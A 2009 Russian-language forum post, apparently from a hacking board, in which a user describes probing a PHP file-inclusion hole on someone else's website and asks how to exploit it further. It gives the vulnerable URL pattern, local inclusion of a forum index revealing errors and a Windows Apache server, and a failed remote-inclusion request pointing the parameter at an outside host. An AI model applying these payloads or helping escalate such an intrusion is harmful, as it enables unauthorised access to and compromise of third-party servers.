Показать сообщение отдельно

  #8528  
Старый 16.08.2009, 10:46
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Смотрите есть сайт с PHP-inj

http://site.ru/module/index.php?p=index

Ну понятно что в $_GET[p] и переносится путь до файла.
Если указываю не верный путь то пишет что фаил не найден, значит стоит проверка на то есть ли фаил...
Открыл config.php начего не написалось так как нет вывода...

Также есть форум на vBulletin ну попробовал открыть индекс
../forum/index мне написалось что пути до конфгов не найдены и уже видел еррор, тоесть ошибки не отключены

Из ошибки видно что апач стоит на винде...
попытки загрузить внешку типо
PHP код:
http://site.ru/module/index.php?p=http://forum.antichat.ru/newreply 
Закнончились неудачей типо фаил не найден, FTP метод тож не прошёл...


Подскажите что можно сделать?

Может так как система на винде, можно чтолить интересного накопать? Хотя не могу оборвать расширение которое присваевается (.php)

Последний раз редактировалось Byrger; 16.08.2009 в 14:36..
 
Ответить с цитированием